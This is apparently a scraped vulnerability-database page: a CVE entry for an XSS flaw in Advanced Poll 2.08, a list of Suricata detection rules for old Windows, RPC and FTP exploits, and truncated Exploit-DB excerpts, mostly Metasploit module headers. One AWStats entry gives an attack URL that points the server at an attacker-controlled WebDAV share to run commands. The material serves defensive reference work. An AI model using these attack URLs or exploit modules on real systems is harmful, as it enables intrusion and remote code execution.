CVE-2010-2003
published 2010-05-20CVE-2010-2003: Cross-site scripting (XSS) vulnerability in misc/get_admin.php in Advanced Poll 2.08 allows remote attackers to inject arbitrary web script or HTML via the…
PriorityP420medium4.3CVSS 2.0
AVNACMAuNCNIPAN
EXPLOIT
EPSS
2.00%
78.3th percentile
Cross-site scripting (XSS) vulnerability in misc/get_admin.php in Advanced Poll 2.08 allows remote attackers to inject arbitrary web script or HTML via the mysql_host parameter.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| proxy2 | advanced_poll | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
Suricata
GPL WEB_SERVER Tomcat null byte directory listing attempt
suricata·2010-09-23
CVE-2003-0042 GPL WEB_SERVER Tomcat null byte directory listing attempt
GPL WEB_SERVER Tomcat null byte directory listing attempt
Rule: alert http $EXTERNAL_NET any -> $HOME_NET any (msg:"GPL WEB_SERVER Tomcat null byte directory listing attempt"; flow:established,to_server; http.uri; content:"|00|.jsp"; reference:bugtraq,2518; reference:bugtraq,6721; reference:cve,2003-0042; classtype:web-application-attack; sid:2102061; rev:9; metadata:created_at 2010_09_23, cve CVE_2003_0042, signature_severity Unknown, updated_at 2024_03_08;)
Suricata
GPL NETBIOS DCERPC CoGetInstanceFromFile overflow attempt
suricata·2010-09-23
CVE-2003-0995 GPL NETBIOS DCERPC CoGetInstanceFromFile overflow attempt
GPL NETBIOS DCERPC CoGetInstanceFromFile overflow attempt
Rule: alert tcp $EXTERNAL_NET any -> $HOME_NET 135 (msg:"GPL NETBIOS DCERPC CoGetInstanceFromFile overflow attempt"; flow:established,to_server; flowbits:isset,smb.tree.bind.msqueue; content:"|05|"; byte_test:1,!&,16,3,relative; content:"|00|"; within:1; distance:1; content:"|01 00|"; within:2; distance:19; byte_test:4,>,128,20,relative; reference:cve,2003-0995; reference:url,www.eeye.com/html/Research/Advisories/AD20030910.html; reference:url,www.microsoft.com/technet/security/bulletin/MS03-026.mspx; classtype:attempted-admin; sid:2103159; rev:4; metadata:created_at 2010_09_23, cve CVE_2003_0995, confidence Medium, signature_severity Informational, updated_at 2019_07_26;)
Suricata
GPL NETBIOS DCERPC msqueue little endian bind attempt
suricata·2010-09-23
CVE-2003-0995 GPL NETBIOS DCERPC msqueue little endian bind attempt
GPL NETBIOS DCERPC msqueue little endian bind attempt
Rule: alert tcp $EXTERNAL_NET any -> $HOME_NET 135 (msg:"GPL NETBIOS DCERPC msqueue little endian bind attempt"; flow:established,to_server; flowbits:set,smb.tree.bind.msqueue; flowbits:noalert; content:"|05|"; depth:1; byte_test:1,&,16,3,relative; content:"|0B|"; within:1; distance:1; content:"|B0 01|R|97 CA|Y|D0 11 A8 D5 00 A0 C9 0D 80|Q"; within:16; distance:29; reference:cve,2003-0995; reference:url,www.eeye.com/html/Research/Advisories/AD20030910.html; reference:url,www.microsoft.com/technet/security/bulletin/MS03-026.mspx; classtype:protocol-command-decode; sid:2103157; rev:6; metadata:created_at 2010_09_23, cve CVE_2003_0995, confidence Medium, signature_severity Informational, tag Description_Generated_By_Proofpoint_Nexus, upda
Suricata
GPL FTP APPE overflow attempt
suricata·2010-09-23
CVE-2000-0133 GPL FTP APPE overflow attempt
GPL FTP APPE overflow attempt
Rule: alert ftp $EXTERNAL_NET any -> $HOME_NET any (msg:"GPL FTP APPE overflow attempt"; flow:established,to_server; content:"APPE"; nocase; isdataat:100,relative; pcre:"/^APPE\s[^\n]{100}/smi"; reference:bugtraq,8315; reference:bugtraq,8542; reference:cve,2000-0133; reference:cve,2003-0466; classtype:attempted-admin; sid:2102391; rev:12; metadata:created_at 2010_09_23, cve CVE_2000_0133, confidence Medium, signature_severity Major, tag Description_Generated_By_Proofpoint_Nexus, updated_at 2024_03_08;)
Suricata
GPL NETBIOS SMB-DS DCERPC LSASS direct bind attempt
suricata·2010-09-23
CVE-2003-0533 GPL NETBIOS SMB-DS DCERPC LSASS direct bind attempt
GPL NETBIOS SMB-DS DCERPC LSASS direct bind attempt
Rule: alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"GPL NETBIOS SMB-DS DCERPC LSASS direct bind attempt"; flow:established,to_server; flowbits:set,netbios.lsass.bind.attempt; flowbits:noalert; content:"|00|"; depth:1; content:"|FF|SMB"; depth:4; offset:4; nocase; content:"|05|"; content:"|0B|"; within:1; distance:1; content:"j|28 19|9|0C B1 D0 11 9B A8 00 C0|O|D9|.|F5|"; within:16; distance:29; reference:bugtraq,10108; reference:cve,2003-0533; reference:url,www.microsoft.com/technet/security/bulletin/MS04-011.mspx; classtype:protocol-command-decode; sid:2102526; rev:9; metadata:created_at 2010_09_23, cve CVE_2003_0533, confidence Medium, signature_severity Informational, updated_at 2024_03_14;)
Suricata
GPL RPC mountd UDP mount path overflow attempt
suricata·2010-09-23
CVE-2003-0252 GPL RPC mountd UDP mount path overflow attempt
GPL RPC mountd UDP mount path overflow attempt
Rule: alert udp $EXTERNAL_NET any -> $HOME_NET any (msg:"GPL RPC mountd UDP mount path overflow attempt"; content:"|00 01 86 A5 00|"; depth:5; offset:12; content:"|00 00 00 01|"; within:4; distance:3; byte_jump:4,4,relative,align; byte_jump:4,4,relative,align; byte_test:4,>,1023,0,relative; content:"|00 00 00 00|"; depth:4; offset:4; reference:bugtraq,8179; reference:cve,2003-0252; reference:nessus,11800; classtype:misc-attack; sid:2102185; rev:8; metadata:created_at 2010_09_23, cve CVE_2003_0252, confidence Medium, signature_severity Informational, tag Description_Generated_By_Proofpoint_Nexus, updated_at 2019_07_26;)
Suricata
GPL NETBIOS DCERPC Workstation Service direct service bind attempt
suricata·2010-09-23
CVE-2003-0812 GPL NETBIOS DCERPC Workstation Service direct service bind attempt
GPL NETBIOS DCERPC Workstation Service direct service bind attempt
Rule: alert tcp $EXTERNAL_NET any -> $HOME_NET 1024: (msg:"GPL NETBIOS DCERPC Workstation Service direct service bind attempt"; flow:established,to_server; content:"|05 00 0B|"; depth:3; byte_test:1,&,16,1,relative; content:"|98 D0 FF|k|12 A1 10|6|98|3F|C3 F8|~4Z"; within:16; distance:29; reference:bugtraq,9011; reference:cve,2003-0812; reference:url,www.microsoft.com/technet/security/bulletin/MS03-049.mspx; classtype:misc-attack; sid:2102315; rev:8; metadata:created_at 2010_09_23, cve CVE_2003_0812, signature_severity Informational, updated_at 2024_03_08;)
Suricata
GPL EXPLOIT NTLM ASN.1 vulnerability scan attempt
suricata·2010-09-23
CVE-2003-0818 GPL EXPLOIT NTLM ASN.1 vulnerability scan attempt
GPL EXPLOIT NTLM ASN.1 vulnerability scan attempt
Rule: alert http1 $EXTERNAL_NET any -> $HTTP_SERVERS any (msg:"GPL EXPLOIT NTLM ASN.1 vulnerability scan attempt"; flow:established,to_server; http.header; content:"Authorization|3A| Negotiate YIQAAABiBoMAAAYrBgEFBQKgggBTMIFQoA4wDAYKKwYBBAGCNwICCqM"; reference:bugtraq,9633; reference:bugtraq,9635; reference:cve,2003-0818; reference:nessus,12052; reference:nessus,12055; reference:nessus,12065; reference:url,www.microsoft.com/technet/security/bulletin/MS04-007.mspx; classtype:attempted-dos; sid:2102386; rev:14; metadata:created_at 2010_09_23, cve CVE_2003_0818, signature_severity Major, updated_at 2024_04_03;)
Suricata
GPL NETBIOS SMB-DS DCERPC NTLMSSP invalid mechlistMIC attempt
suricata·2010-09-23
CVE-2003-0818 GPL NETBIOS SMB-DS DCERPC NTLMSSP invalid mechlistMIC attempt
GPL NETBIOS SMB-DS DCERPC NTLMSSP invalid mechlistMIC attempt
Rule: alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"GPL NETBIOS SMB-DS DCERPC NTLMSSP invalid mechlistMIC attempt"; flow:established,to_server; content:"|FF|SMBs"; depth:5; offset:4; nocase; content:"`"; depth:1; offset:63; content:"|00 00 00|b|06 83 00 00 06|+|06 01 05 05 02|"; within:15; distance:1; content:"|06 0A|+|06 01 04 01 82|7|02 02 0A|"; distance:0; content:"|A3|>0<|A0|0"; distance:0; reference:bugtraq,9633; reference:bugtraq,9635; reference:cve,2003-0818; reference:nessus,12052; reference:nessus,12054; reference:nessus,12065; classtype:attempted-dos; sid:2102385; rev:13; metadata:created_at 2010_09_23, cve CVE_2003_0818, confidence Medium, signature_severity Informational, updated_at 2024_03_08;)
Suricata
GPL RPC portmap proxy integer overflow attempt TCP
suricata·2010-09-23
CVE-2003-0028 GPL RPC portmap proxy integer overflow attempt TCP
GPL RPC portmap proxy integer overflow attempt TCP
Rule: alert tcp $EXTERNAL_NET any -> $HOME_NET 111 (msg:"GPL RPC portmap proxy integer overflow attempt TCP"; flow:established,to_server; content:"|00 01 86 A0 00|"; depth:5; offset:16; content:"|00 00 00 05|"; within:4; distance:3; byte_jump:4,4,relative,align; byte_jump:4,4,relative,align; byte_test:4,>,2048,12,relative; content:"|00 00 00 00|"; depth:4; offset:8; reference:bugtraq,7123; reference:cve,2003-0028; classtype:rpc-portmap-decode; sid:2102093; rev:7; metadata:created_at 2010_09_23, cve CVE_2003_0028, confidence Medium, signature_severity Informational, updated_at 2024_03_08;)
Suricata
GPL NETBIOS SMB-DS Session Setup NTMLSSP asn1 overflow attempt
suricata·2010-09-23
CVE-2003-0818 GPL NETBIOS SMB-DS Session Setup NTMLSSP asn1 overflow attempt
GPL NETBIOS SMB-DS Session Setup NTMLSSP asn1 overflow attempt
Rule: alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"GPL NETBIOS SMB-DS Session Setup NTMLSSP asn1 overflow attempt"; flow:established,to_server; content:"|00|"; depth:1; content:"|FF|SMBs"; within:5; distance:3; byte_test:1,!&,128,6,relative; byte_test:4,&,2147483648,48,relative,little; content:!"NTLMSSP"; within:7; distance:54; asn1:double_overflow, bitstring_overflow, relative_offset 54, oversize_length 2048; reference:bugtraq,9633; reference:bugtraq,9635; reference:cve,2003-0818; reference:nessus,12052; reference:nessus,12065; reference:url,www.microsoft.com/technet/security/bulletin/MS04-007.mspx; classtype:protocol-command-decode; sid:2102383; rev:21; metadata:created_at 2010_09_23, cve CVE_2003_0818, confidence Medi
Suricata
GPL NETBIOS DCERPC Remote Activation bind attempt
suricata·2010-09-23
CVE-2003-0528 GPL NETBIOS DCERPC Remote Activation bind attempt
GPL NETBIOS DCERPC Remote Activation bind attempt
Rule: alert tcp $EXTERNAL_NET any -> $HOME_NET 135 (msg:"GPL NETBIOS DCERPC Remote Activation bind attempt"; flow:established,to_server; content:"|05|"; content:"|0B|"; within:1; distance:1; byte_test:1,&,1,0,relative; content:"|B8|J|9F|M|1C|}|CF 11 86 1E 00| |AF|n|7C|W"; within:16; distance:29; tag:session,5,packets; reference:bugtraq,8234; reference:bugtraq,8458; reference:cve,2003-0528; reference:cve,2003-0605; reference:cve,2003-0715; reference:nessus,11798; reference:nessus,11835; reference:url,www.microsoft.com/technet/security/bulletin/MS03-039.mspx; classtype:attempted-admin; sid:2102251; rev:17; metadata:created_at 2010_09_23, cve CVE_2003_0528, signature_severity Informational, updated_at 2024_03_08;)
Suricata
GPL NETBIOS DCERPC LSASS direct bind attempt
suricata·2010-09-23
CVE-2003-0533 GPL NETBIOS DCERPC LSASS direct bind attempt
GPL NETBIOS DCERPC LSASS direct bind attempt
Rule: alert tcp $EXTERNAL_NET any -> $HOME_NET 135 (msg:"GPL NETBIOS DCERPC LSASS direct bind attempt"; flow:established,to_server; flowbits:set,netbios.lsass.bind.attempt; flowbits:noalert; content:"|00|"; depth:1; content:"|FF|SMB"; depth:4; offset:4; nocase; content:"|05|"; content:"|0B|"; within:1; distance:1; content:"j|28 19|9|0C B1 D0 11 9B A8 00 C0|O|D9|.|F5|"; within:16; distance:29; reference:bugtraq,10108; reference:cve,2003-0533; reference:url,www.microsoft.com/technet/security/bulletin/MS04-011.mspx; classtype:protocol-command-decode; sid:2102524; rev:10; metadata:created_at 2010_09_23, cve CVE_2003_0533, confidence Medium, signature_severity Informational, updated_at 2024_03_14;)
Suricata
GPL NETBIOS SMB-DS DCERPC Workstation Service unicode bind attempt
suricata·2010-09-23
CVE-2003-0812 GPL NETBIOS SMB-DS DCERPC Workstation Service unicode bind attempt
GPL NETBIOS SMB-DS DCERPC Workstation Service unicode bind attempt
Rule: alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"GPL NETBIOS SMB-DS DCERPC Workstation Service unicode bind attempt"; flow:established,to_server; content:"|00|"; depth:1; content:"|FF|SMB%"; depth:5; offset:4; nocase; byte_test:2,&,1,5,relative; content:"&|00|"; within:2; distance:56; content:"|5C 00|P|00|I|00|P|00|E|00 5C 00 05 00 0B|"; within:15; distance:4; byte_test:1,&,16,1,relative; content:"|98 D0 FF|k|12 A1 10|6|98|3F|C3 F8|~4Z"; within:16; distance:29; reference:bugtraq,9011; reference:cve,2003-0812; reference:url,www.microsoft.com/technet/security/bulletin/MS03-049.mspx; classtype:misc-attack; sid:2102310; rev:10; metadata:created_at 2010_09_23, cve CVE_2003_0812, confidence Medium, signature_severity Inf
Suricata
GPL NETBIOS SMB-DS DCERPC Workstation Service bind attempt
suricata·2010-09-23
CVE-2003-0812 GPL NETBIOS SMB-DS DCERPC Workstation Service bind attempt
GPL NETBIOS SMB-DS DCERPC Workstation Service bind attempt
Rule: alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"GPL NETBIOS SMB-DS DCERPC Workstation Service bind attempt"; flow:established,to_server; content:"|00|"; depth:1; content:"|FF|SMB%"; depth:5; offset:4; nocase; byte_test:2,^,1,5,relative; content:"&|00|"; within:2; distance:56; content:"|5C|PIPE|5C 00 05 00 0B|"; within:10; distance:4; byte_test:1,&,16,1,relative; content:"|98 D0 FF|k|12 A1 10|6|98|3F|C3 F8|~4Z"; within:16; distance:29; reference:bugtraq,9011; reference:cve,2003-0812; reference:url,www.microsoft.com/technet/security/bulletin/MS03-049.mspx; classtype:misc-attack; sid:2102311; rev:9; metadata:created_at 2010_09_23, cve CVE_2003_0812, confidence Medium, signature_severity Informational, updated_at 2024_03_08;)
Suricata
GPL NETBIOS SMB DCERPC LSASS direct bind attempt
suricata·2010-09-23
CVE-2003-0533 GPL NETBIOS SMB DCERPC LSASS direct bind attempt
GPL NETBIOS SMB DCERPC LSASS direct bind attempt
Rule: alert tcp $EXTERNAL_NET any -> $HOME_NET 139 (msg:"GPL NETBIOS SMB DCERPC LSASS direct bind attempt"; flow:established,to_server; flowbits:set,netbios.lsass.bind.attempt; flowbits:noalert; content:"|00|"; depth:1; content:"|FF|SMB"; depth:4; offset:4; nocase; content:"|05|"; content:"|0B|"; within:1; distance:1; content:"j|28 19|9|0C B1 D0 11 9B A8 00 C0|O|D9|.|F5|"; within:16; distance:29; reference:bugtraq,10108; reference:cve,2003-0533; reference:url,www.microsoft.com/technet/security/bulletin/MS04-011.mspx; classtype:protocol-command-decode; sid:2102525; rev:9; metadata:created_at 2010_09_23, cve CVE_2003_0533, confidence Medium, signature_severity Informational, tag Description_Generated_By_Proofpoint_Nexus, updated_at 2024_03_14
Suricata
GPL NETBIOS SMB trans2open buffer overflow attempt
suricata·2010-09-23
CVE-2003-0201 GPL NETBIOS SMB trans2open buffer overflow attempt
GPL NETBIOS SMB trans2open buffer overflow attempt
Rule: alert tcp $EXTERNAL_NET any -> $HOME_NET 139 (msg:"GPL NETBIOS SMB trans2open buffer overflow attempt"; flow:established,to_server; content:"|00|"; depth:1; content:"|FF|SMB2"; depth:5; offset:4; content:"|00 14|"; depth:2; offset:60; byte_test:2,>,256,0,relative,little; reference:bugtraq,7294; reference:cve,2003-0201; reference:url,www.digitaldefense.net/labs/advisories/DDI-1013.txt; classtype:attempted-admin; sid:2102103; rev:11; metadata:created_at 2010_09_23, cve CVE_2003_0201, confidence High, signature_severity Major, updated_at 2024_03_08;)
Suricata
GPL NETBIOS SMB-DS DCERPC Messenger Service buffer overflow attempt
suricata·2010-09-23
CVE-2003-0717 GPL NETBIOS SMB-DS DCERPC Messenger Service buffer overflow attempt
GPL NETBIOS SMB-DS DCERPC Messenger Service buffer overflow attempt
Rule: alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"GPL NETBIOS SMB-DS DCERPC Messenger Service buffer overflow attempt"; flow:established,to_server; content:"|FF|SMB%"; depth:5; offset:4; nocase; content:"&|00|"; within:2; distance:56; content:"|5C 00|P|00|I|00|P|00|E|00 5C 00|"; within:12; distance:5; nocase; content:"|04 00|"; within:2; byte_test:1,>,15,2,relative; byte_jump:4,86,little,align,relative; byte_jump:4,8,little,align,relative; byte_test:4,>,1024,0,little,relative; reference:bugtraq,8826; reference:cve,2003-0717; reference:nessus,11888; reference:nessus,11890; reference:url,www.microsoft.com/technet/security/bulletin/MS03-043.mspx; classtype:attempted-admin; sid:2102258; rev:11; metadata:created_at 2010
Exploit-DB
Microsoft Office 2007 - 'mso.dll' Use-After-Free (MS15-081)
exploitdb·2015-08-21
CVE-2015-2467 Microsoft Office 2007 - 'mso.dll' Use-After-Free (MS15-081)
Microsoft Office 2007 - 'mso.dll' Use-After-Free (MS15-081)
---
Source: https://code.google.com/p/google-security-research/issues/detail?id=414&can=1
The following crash was observed in MS Office 2007 running under Windows 2003 x86. Microsoft Office File Validation Add-In is disabled and application verified was enabled for testing and reproduction. This sample did not reproduce in Office 2010 running on Windows 7 x86.
The attached minimized PoC that produces the crash with 2 bit changes from the original file at offsets 0x11E60 and 0x1515F. Standard office document parsers did not reveal any significance about this location.
Attached files:
Fuzzed minimized PoC: 1567070353_min.doc
Fuzzed non-minimized PoC: 1567070353_crash.doc
Original non-fuzzed file: 1567070353_orig.doc
DLL Versi
Exploit-DB
AWStats 6.x - Apache Tomcat Configuration File Arbitrary Command Execution
exploitdb·2010-11-30
CVE-2010-4367 AWStats 6.x - Apache Tomcat Configuration File Arbitrary Command Execution
AWStats 6.x - Apache Tomcat Configuration File Arbitrary Command Execution
---
source: https://www.securityfocus.com/bid/45123/info
Awstats is prone to an arbitrary command-execution vulnerability. This issue occurs when Awstats is used along with Apache Tomcat in Microsoft Windows.
An attacker can exploit this vulnerability to execute arbitrary shell commands in the context of the webserver process. This may help attackers compromise the underlying system; other attacks are also possible.
AWStats 6.95 and prior versions are vulnerable.
Attacking Windows XP Apache Tomcat AWStats Server:
http://www.example.com/cgi-bin/awstats.cgi?config=attacker&pluginmode=rawlog&configdir=\\Attacker-IPAddress:80\webdav
Attacking Windows 2003 or Windows XP AWStats Server:
http://www.example.com/cgi-b
Exploit-DB
Microsoft Exchange Server 2000 - XEXCH50 Heap Overflow (MS03-046) (Metasploit)
exploitdb·2010-11-11
CVE-2003-0714 Microsoft Exchange Server 2000 - XEXCH50 Heap Overflow (MS03-046) (Metasploit)
Microsoft Exchange Server 2000 - XEXCH50 Heap Overflow (MS03-046) (Metasploit)
---
##
# $Id: ms03_046_exchange2000_xexch50.rb 10998 2010-11-11 22:43:22Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'MS03-046 Exchange 2000 XEXCH50 Heap Overflow',
'Description' => %q{
This is an exploit for the Exchange 2000 heap overflow. Due
to the nature of the vulnerability, this exploit is not very
reliable. This module has been tested against Exchange 2000
SP0 and SP3 running a Windows 2000 system patched to SP4. It
normally takes between one
Exploit-DB
Oracle 9i XDB (Windows x86) - FTP UNLOCK Overflow (Metasploit)
exploitdb·2010-10-05
CVE-2003-0727 Oracle 9i XDB (Windows x86) - FTP UNLOCK Overflow (Metasploit)
Oracle 9i XDB (Windows x86) - FTP UNLOCK Overflow (Metasploit)
---
##
# $Id: oracle9i_xdb_ftp_unlock.rb 10559 2010-10-05 23:41:17Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'Oracle 9i XDB FTP UNLOCK Overflow (win32)',
'Description' => %q{
By passing an overly long token to the UNLOCK command, a
stack based buffer overflow occurs. David Litchfield, has
illustrated multiple vulnerabilities in the Oracle 9i XML
Database (XDB), during a seminar on "Variations in exploit
methods between Linux and Windows" presented at the Blackhat
c
Exploit-DB
Microsoft IIS 6.0 - ASP Stack Overflow Stack Exhaustion (Denial of Service) (MS10-065)
exploitdb·2010-10-01
CVE-2010-1899 Microsoft IIS 6.0 - ASP Stack Overflow Stack Exhaustion (Denial of Service) (MS10-065)
Microsoft IIS 6.0 - ASP Stack Overflow Stack Exhaustion (Denial of Service) (MS10-065)
---
Affected Vendors
Microsoft
Affected Products
Only Microsoft IIS 6.0 was tested successfully
On a Windows Server 2003 SP2 System
The System was NOT updated to the latest patches during testing.
Since tests “in the wild” have shown the attack to be real this advisory was released.
Vulnerability Details
The vulnerability allows remote unauthenticated attackers to force the IIS server to become
unresponsive until the IIS service is restarted manually by the administrator.
Required is that Active Server Pages are hosted by the IIS and that an ASP script reads out a
Post Form value. When the following ASP script is hosted by IIS the attacker can run the
attack:
This small script reads out a POST re
Exploit-DB
Microsoft Windows XP/Vista/2003 - Metafile Escape() SetAbortProc Code Execution (MS06-001) (Metasploit)
exploitdb·2010-09-20
CVE-2005-4560 Microsoft Windows XP/Vista/2003 - Metafile Escape() SetAbortProc Code Execution (MS06-001) (Metasploit)
Microsoft Windows XP/Vista/2003 - Metafile Escape() SetAbortProc Code Execution (MS06-001) (Metasploit)
---
##
# $Id: ms06_001_wmf_setabortproc.rb 10394 2010-09-20 08:06:27Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'Windows XP/2003/Vista Metafile Escape() SetAbortProc Code Execution',
'Description' => %q{
This module exploits a vulnerability in the GDI library included with
Windows XP and 2003. This vulnerability uses the 'Escape' metafile function
to execute arbitrary code through the SetAbortProc procedure. This module
gener
Exploit-DB
Oracle 9i XDB (Windows x86) - HTTP PASS Overflow (Metasploit)
exploitdb·2010-09-20
CVE-2003-0727 Oracle 9i XDB (Windows x86) - HTTP PASS Overflow (Metasploit)
Oracle 9i XDB (Windows x86) - HTTP PASS Overflow (Metasploit)
---
##
# $Id: oracle9i_xdb_pass.rb 10394 2010-09-20 08:06:27Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'Oracle 9i XDB HTTP PASS Overflow (win32)',
'Description' => %q{
This module exploits a stack buffer overflow in the authorization
code of the Oracle 9i HTTP XDB service. David Litchfield,
has illustrated multiple vulnerabilities in the Oracle
9i XML Database (XDB), during a seminar on "Variations
in exploit methods between Linux and Windows" presented
at the Black
Exploit-DB
eshtery CMS - SQL Injection
exploitdb·2010-09-12
CVE-2010-3404 eshtery CMS - SQL Injection
eshtery CMS - SQL Injection
---
'''
__ __ ____ _ _ ____
| \/ |/ __ \ /\ | | | | _ \
| \ / | | | | / \ | | | | |_) |
| |\/| | | | |/ /\ \| | | | _ <
| | | | |__| / ____ \ |__| | |_) |
|_| |_|\____/_/ \_\____/|____/
http://www.exploit-db.com/moaub12-eshtery-cms-sql-injection-vulnerability/
'''
Abysssec Inc Public Advisory
Title : eshtery CMS Sql Injection Vulnerability
Affected Version : eshtery copyrights 2003-2004
Discovery : www.abysssec.com
Vendor : http://eshtery.she7ata.com/projects/eshtery/
Demo : http://eshtery.she7ata.com/projects/eshtery/
Download Links : http://sourceforge.net/projects/eshtery/
Description :
1) SQL Injection
for successful injection in this cms you have to pass two steps.
Step 1:
Go to this path:
http://Example.com/catlgsearch.aspx
and enter this value
Exploit-DB
Microsoft Internet Explorer - Object Type (MS03-020) (Metasploit)
exploitdb·2010-08-25
CVE-2003-0344 Microsoft Internet Explorer - Object Type (MS03-020) (Metasploit)
Microsoft Internet Explorer - Object Type (MS03-020) (Metasploit)
---
##
# $Id: ms03_020_ie_objecttype.rb 10150 2010-08-25 20:55:37Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 HttpClients::IE,
:javascript => false,
:os_name => OperatingSystems::WINDOWS,
:vuln_test => nil, # no way to test without just trying it
:prefix_html => "",
:postfix_html => "",
:rank => NormalRanking # reliable memory corruption
})
def initialize(info = {})
super(update_info(info,
'Name' => 'MS03-020 Internet Explorer Object Type',
'Description' => %q{
T
Exploit-DB
CA Advantage Ingres 2.6 - Multiple Buffer Overflow Vulnerabilities (PoC)
exploitdb·2010-08-14·CVSS 10.0
CVE-2007-3336 [CRITICAL] CA Advantage Ingres 2.6 - Multiple Buffer Overflow Vulnerabilities (PoC)
CA Advantage Ingres 2.6 - Multiple Buffer Overflow Vulnerabilities (PoC)
---
# Exploit Title: Computer Associates Advantage Ingres 2.6 Multiple Buffer Overflow Vulnerabilities PoC
# Date: 2010-08-14
# Author: @fdiskyou
# e-mail: rui at deniable.org
# Version: 2.6
# Tested on: Windows 2003 Server SP1 en
# CVE: CVE-2007-3336 - CVE-2007-3338
# Notes: Fixed in the last version.
# iigcc - EDX holds a pointer that's overwritten at byte 2106 and it crashes while executing
# MOV EAX,DWORD PTR DS:[EDX+8]
# iijdbc - EDI holds a pointer that's overwritten at byte 1066 and it crashes while executing
# CMP ECX,DWORD PTR DS:[EDI+4]
# please let me know if you are/were able to get code execution
import socket
import sys
if len(sys.argv) != 4:
print "Usage: ./CAAdvantageDoS.py "
print "Vulnerable Serv
Exploit-DB
Microsoft Windows - ASN.1 Library Bitstring Heap Overflow (MS04-007) (Metasploit)
exploitdb·2010-07-25
CVE-2003-0818 Microsoft Windows - ASN.1 Library Bitstring Heap Overflow (MS04-007) (Metasploit)
Microsoft Windows - ASN.1 Library Bitstring Heap Overflow (MS04-007) (Metasploit)
---
##
# $Id: ms04_007_killbill.rb 9929 2010-07-25 21:37:54Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'Microsoft ASN.1 Library Bitstring Heap Overflow',
'Description' => %q{
This is an exploit for a previously undisclosed
vulnerability in the bit string decoding code in the
Microsoft ASN.1 library. This vulnerability is not related
to the bit string vulnerability described in eEye advisory
AD20040210-2. Both vulnerabilities were fixed in the
MS04
Exploit-DB
Microsoft IIS - ISAPI 'nsiislog.dll' ISAPI POST Overflow (MS03-022) (Metasploit)
exploitdb·2010-07-25
CVE-2003-0349 Microsoft IIS - ISAPI 'nsiislog.dll' ISAPI POST Overflow (MS03-022) (Metasploit)
Microsoft IIS - ISAPI 'nsiislog.dll' ISAPI POST Overflow (MS03-022) (Metasploit)
---
##
# $Id: ms03_022_nsiislog_post.rb 9929 2010-07-25 21:37:54Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'Microsoft IIS ISAPI nsiislog.dll ISAPI POST Overflow',
'Description' => %q{
This exploits a buffer overflow found in the nsiislog.dll
ISAPI filter that comes with Windows Media Server. This
module will also work against the 'patched' MS03-019
version. This vulnerability was addressed by MS03-022.
},
'Author' => [ 'hdm' ],
'License' => MSF_LI
Exploit-DB
Microsoft LSASS Service - DsRolerUpgradeDownlevelServer Overflow (MS04-011) (Metasploit)
exploitdb·2010-07-03
CVE-2003-0533 Microsoft LSASS Service - DsRolerUpgradeDownlevelServer Overflow (MS04-011) (Metasploit)
Microsoft LSASS Service - DsRolerUpgradeDownlevelServer Overflow (MS04-011) (Metasploit)
---
##
# $Id: ms04_011_lsass.rb 9669 2010-07-03 03:13:45Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'Microsoft LSASS Service DsRolerUpgradeDownlevelServer Overflow',
'Description' => %q{
This module exploits a stack buffer overflow in the LSASS service, this vulnerability
was originally found by eEye. When re-exploiting a Windows XP system, you will need
need to run this module twice. DCERPC request fragmentation can be performed by setting
Exploit-DB
Microsoft Internet Explorer - WebViewFolderIcon setSlice() Overflow (MS06-057) (Metasploit) (2)
exploitdb·2010-07-03
CVE-2006-3730 Microsoft Internet Explorer - WebViewFolderIcon setSlice() Overflow (MS06-057) (Metasploit) (2)
Microsoft Internet Explorer - WebViewFolderIcon setSlice() Overflow (MS06-057) (Metasploit) (2)
---
##
# $Id: ms06_057_webview_setslice.rb 9669 2010-07-03 03:13:45Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'Internet Explorer WebViewFolderIcon setSlice() Overflow',
'Description' => %q{
This module exploits a flaw in the WebViewFolderIcon ActiveX control
included with Windows 2000, Windows XP, and Windows 2003. This flaw was published
during the Month of Browser Bugs project (MoBB #18).
},
'License' => MSF_LICENSE,
'Author' =>
[
Exploit-DB
QuickTime Streaming Server - 'parse_xml.cgi' Remote Execution (Metasploit)
exploitdb·2010-07-03
